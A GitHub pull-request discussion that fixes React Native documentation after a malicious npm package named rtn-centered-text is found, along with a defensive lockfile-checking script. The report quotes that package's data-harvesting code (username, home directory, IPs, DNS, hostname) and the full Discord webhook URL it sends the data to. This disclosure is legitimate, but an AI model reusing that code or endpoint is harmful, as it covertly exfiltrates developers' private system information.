Conversation

@weese
Contributor

@weese weese commented Nov 17, 2024

The documentation mentioned that yarn upgrade rtn-centered-text would sync the latest changes from the local RTNCenteredText package into the node_modules folder. In fact, that's wrong and, even worse, it opens a door to malicious package injection. 2 days ago someone posted a package on npmjs with the name rtn-centered-text that uploads information like private/public IP, local operating system, etc. to some Discord channel.

https://www.npmjs.com/package/rtn-centered-text

This is an excerpt of the collected user information:

// Prepare the tracking data
getExternalIP((externalIP) => {
    const trackingData = JSON.stringify({
        package: package,
        directory: __dirname,
        home_directory: os.homedir(),
        username: os.userInfo().username,
        dns: dns.getServers(),
        internal_hostname: os.hostname(),
        internal_ip: getIPAddress(), // Add internal IP address here
        external_ip: externalIP.ip, // Get External IP Address
        external_hostname: externalIP.hostname,
        organization: externalIP.organization,
        resolved_url: packageJSON ? packageJSON.___resolved : undefined,
        package_version: packageJSON.version,
        package_json: packageJSON,
        package_type: 'npm',
    });

This data is then uploaded to:
https://discord.com/api/webhooks/1306068586086793297/5ERJ-0yumqHWIUMiaww5_SdUkVAptuIxMIUMbTaEY--c5IyIDDA4aYHdKIi6YwYJ_7mS

I've reported the issue already to npmjs, but please close the door here as well. A simple yarn add syncs a local package.
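An added check, not code from the PR or from the react-native-new-architecture repository, that a CI step could run to catch the situation described above: it parses package.json and yarn.lock (v1 format) and flags any package that is supposed to come from a local checkout but is declared by version range or was resolved from a registry URL. The package name and lockfile contents used as input are constructed samples.

```javascript
// Added example (not from the PR or the repository). Verifies that packages which
// must come from a local checkout were never fetched from a registry.

// Parse yarn.lock v1 into { name: [{ specifier, version, resolved }] }.
function parseYarnLock(text) {
  const entries = {};
  let current = []; // specifiers of the entry whose body is being read
  const nameOf = (spec) => spec.slice(0, spec.lastIndexOf('@')); // handles @scope/name
  for (const line of text.split('\n')) {
    if (line.startsWith('#') || line.trim() === '') continue;
    if (!/^\s/.test(line) && line.endsWith(':')) {
      // Header line: one or more comma-separated, optionally quoted "name@range".
      current = line.slice(0, -1).split(',').map((s) => s.trim().replace(/^"|"$/g, ''));
      for (const spec of current) {
        const n = nameOf(spec);
        (entries[n] = entries[n] || []).push({ specifier: spec, version: '', resolved: '' });
      }
      continue;
    }
    const m = line.match(/^\s+(version|resolved) "([^"]+)"/);
    if (!m) continue;
    for (const spec of current) {
      entries[nameOf(spec)].find((e) => e.specifier === spec)[m[1]] = m[2];
    }
  }
  return entries;
}

// Findings for each package that must be local; an empty array means all is well.
function checkLocalPackages(appManifest, lockText, expectedLocal) {
  const findings = [];
  const deps = { ...(appManifest.dependencies || {}), ...(appManifest.devDependencies || {}) };
  const lock = parseYarnLock(lockText);
  for (const name of expectedLocal) {
    const spec = deps[name];
    if (spec === undefined) findings.push(`${name}: not declared in package.json`);
    else if (!/^(file|link):/.test(spec)) findings.push(`${name}: declared as "${spec}", not a file:/link: path`);
    for (const e of lock[name] || []) {
      // A registry URL here means the same-named public package was installed.
      if (/^https?:\/\//.test(e.resolved)) findings.push(`${name}@${e.version}: resolved from ${e.resolved}`);
    }
  }
  return findings;
}

// Constructed samples: a version range lets yarn fetch a registry package of the
// same name, while a file: path keeps the local RTNCenteredText checkout.
const BAD_MANIFEST = { dependencies: { 'rtn-centered-text': '^1.0.0' } };
const BAD_LOCK = 'rtn-centered-text@^1.0.0:\n  version "1.0.0"\n' +
  '  resolved "https://registry.yarnpkg.com/rtn-centered-text/-/rtn-centered-text-1.0.0.tgz#0000"\n';
const GOOD_MANIFEST = { dependencies: { 'rtn-centered-text': 'file:../RTNCenteredText' } };
const GOOD_LOCK = '"rtn-centered-text@file:../RTNCenteredText":\n  version "0.0.1"\n';
```

Running checkLocalPackages(BAD_MANIFEST, BAD_LOCK, ['rtn-centered-text']) reports both the version-range declaration and the registry resolution, while the GOOD inputs produce no findings.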

Collaborator

@cortinico cortinico left a comment

Thank you very much for sending this over

@cortinico cortinico merged commit cf0ecfd into reactwg:main Dec 2, 2024